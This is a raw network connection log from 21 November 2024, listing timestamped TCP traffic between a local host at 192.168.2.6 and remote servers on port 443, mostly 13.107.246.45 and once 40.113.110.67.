Nov 21, 2024 09:54:13.348172903 CET	49828	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.348187923 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.348198891 CET	49828	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.348203897 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.350651979 CET	49833	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.350691080 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.350841999 CET	49833	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.351104975 CET	49833	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.351114988 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.385811090 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.386009932 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.386079073 CET	49829	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.386280060 CET	49829	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.386316061 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.386343956 CET	49829	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.386359930 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.389925957 CET	49834	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.389993906 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.390214920 CET	49834	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.390346050 CET	49834	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.390374899 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.527857065 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.528326035 CET	49830	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.528347969 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.528894901 CET	49830	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.528898954 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.675192118 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.675642014 CET	49831	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.675678015 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.676079988 CET	49831	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.676095963 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.962264061 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.962418079 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.962477922 CET	49830	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.962604046 CET	49830	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.962619066 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.962630033 CET	49830	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.962635040 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.965204000 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.965245008 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.965351105 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.965544939 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.965550900 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.984126091 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.984539032 CET	49832	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.984584093 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:14.984942913 CET	49832	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:14.984957933 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.119057894 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.119117022 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.119335890 CET	49831	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.119385004 CET	49831	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.119385004 CET	49831	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.119410992 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.119422913 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.121902943 CET	49836	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.122014999 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.122102976 CET	49836	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.122256041 CET	49836	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.122287035 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.134562016 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.134993076 CET	49833	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.135006905 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.135432959 CET	49833	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.135437965 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.233880997 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.234250069 CET	49834	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.234278917 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.234723091 CET	49834	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.234734058 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.438375950 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.438533068 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.438616037 CET	49832	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.438724995 CET	49832	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.438772917 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.438831091 CET	49832	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.438847065 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.441406012 CET	49837	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.441468954 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.441554070 CET	49837	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.441742897 CET	49837	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.441764116 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.581392050 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.581460953 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.581516981 CET	49833	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.581700087 CET	49833	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.581717014 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.581726074 CET	49833	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.581729889 CET	443	49833	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.584119081 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.584165096 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.584240913 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.584387064 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.584399939 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.687937021 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.688023090 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.688224077 CET	49834	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.688302994 CET	49834	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.688344955 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.688375950 CET	49834	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.688388109 CET	443	49834	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.690681934 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.690735102 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:15.690819025 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.690993071 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:15.691013098 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:16.764431953 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:16.765007019 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:16.765038013 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:16.765613079 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:16.765618086 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:16.940259933 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:16.940764904 CET	49836	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:16.940793991 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:16.941378117 CET	49836	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:16.941384077 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.214977980 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.215028048 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.215137005 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.215159893 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.215181112 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.215229988 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.215326071 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.215339899 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.215348959 CET	49835	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.215353966 CET	443	49835	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.217734098 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.217753887 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.217961073 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.217961073 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.217983961 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.297035933 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.297595024 CET	49837	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.297662020 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.298134089 CET	49837	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.298147917 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.365982056 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.366451025 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.366487026 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.366885900 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.366889954 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.385392904 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.385452986 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.385504961 CET	49836	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.385646105 CET	49836	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.385663033 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.385675907 CET	49836	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.385680914 CET	443	49836	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.388295889 CET	49841	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.388389111 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.388477087 CET	49841	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.388605118 CET	49841	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.388631105 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.543946981 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.544500113 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.544538975 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.545066118 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.545073986 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.749921083 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.750006914 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.750116110 CET	49837	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.750370979 CET	49837	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.750392914 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.750412941 CET	49837	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.750422001 CET	443	49837	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.753200054 CET	49842	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.753247023 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.753500938 CET	49842	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.753675938 CET	49842	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.753688097 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.815469980 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.815491915 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.815541029 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.815566063 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.815701962 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.815716982 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.815722942 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.815871000 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.815896034 CET	443	49838	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.817241907 CET	49838	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.817799091 CET	49843	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.817842007 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.818366051 CET	49843	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.818490982 CET	49843	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:17.818510056 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:17.980914116 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:17.980957985 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:17.981051922 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:17.981549025 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:17.981559992 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:18.001744986 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:18.001766920 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:18.001825094 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:18.001846075 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:18.001885891 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:18.002078056 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:18.002087116 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:18.002101898 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:18.002243042 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:18.002269030 CET	443	49839	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:18.002315998 CET	49839	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:18.004461050 CET	49845	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:18.004501104 CET	443	49845	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:18.005251884 CET	49845	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:18.005389929 CET	49845	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:18.005399942 CET	443	49845	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.006694078 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.007154942 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.007179976 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.007594109 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.007600069 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.168210983 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.168520927 CET	49841	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.168550968 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.168942928 CET	49841	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.168953896 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.454294920 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.454360008 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.454430103 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.454452038 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.454670906 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.454687119 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.454696894 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.455049038 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.455133915 CET	443	49840	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.455236912 CET	49840	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.457251072 CET	49846	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.457298040 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.457406044 CET	49846	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.457551956 CET	49846	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.457562923 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.548930883 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.549846888 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.550355911 CET	49842	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.550358057 CET	49843	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.550374031 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.550385952 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.550801039 CET	49842	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.550806999 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.551126003 CET	49843	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.551134109 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.613854885 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.616949081 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.617022038 CET	49841	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.617060900 CET	49841	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.617082119 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.617088079 CET	49841	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.617098093 CET	443	49841	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.619524956 CET	49847	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.619575024 CET	443	49847	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.619673967 CET	49847	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.619822025 CET	49847	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.619836092 CET	443	49847	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.854756117 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:19.854830980 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:19.856301069 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:19.856309891 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:19.856494904 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:19.860408068 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:19.860486984 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:19.860491991 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:19.860657930 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:19.907326937 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:19.953926086 CET	443	49845	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.954416037 CET	49845	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.954479933 CET	443	49845	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.954874039 CET	49845	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.954888105 CET	443	49845	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.987545013 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.990662098 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.990755081 CET	49843	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.990820885 CET	49843	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.990849972 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.990870953 CET	49843	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.990883112 CET	443	49843	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.992595911 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.993318081 CET	49848	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.993411064 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.993490934 CET	49848	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.993662119 CET	49848	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.993710995 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.995733976 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.995893955 CET	49842	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.995950937 CET	49842	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.995965004 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.995974064 CET	49842	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.995979071 CET	443	49842	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.998184919 CET	49849	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.998213053 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:19.998300076 CET	49849	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.998404980 CET	49849	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:19.998414993 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:20.389312029 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:20.389759064 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:20.389790058 CET	443	49844	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:20.389801979 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:20.389853001 CET	49844	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:20.407351017 CET	443	49845	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:20.410461903 CET	443	49845	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:20.410537004 CET	49845	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:20.410619974 CET	49845	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:20.410638094 CET	443	49845	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:20.413702965 CET	49850	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:20.413738012 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:20.413988113 CET	49850	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:20.413988113 CET	49850	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:20.414011002 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.239810944 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.240245104 CET	49846	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.240261078 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.240699053 CET	49846	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.240705967 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.335006952 CET	443	49847	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.335443974 CET	49847	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.335479975 CET	443	49847	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.335886002 CET	49847	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.335890055 CET	443	49847	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.750418901 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.753729105 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.753791094 CET	49846	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.753858089 CET	49846	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.753885984 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.753892899 CET	49846	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.753901005 CET	443	49846	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.756684065 CET	49851	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.756727934 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.757080078 CET	49851	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.757224083 CET	49851	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.757236958 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.780437946 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.780849934 CET	49849	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.780869961 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.781390905 CET	49849	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.781399012 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.840831995 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.841299057 CET	49848	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.841383934 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.841754913 CET	49848	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.841768980 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.862283945 CET	443	49847	13.107.246.45	192.168.2.6
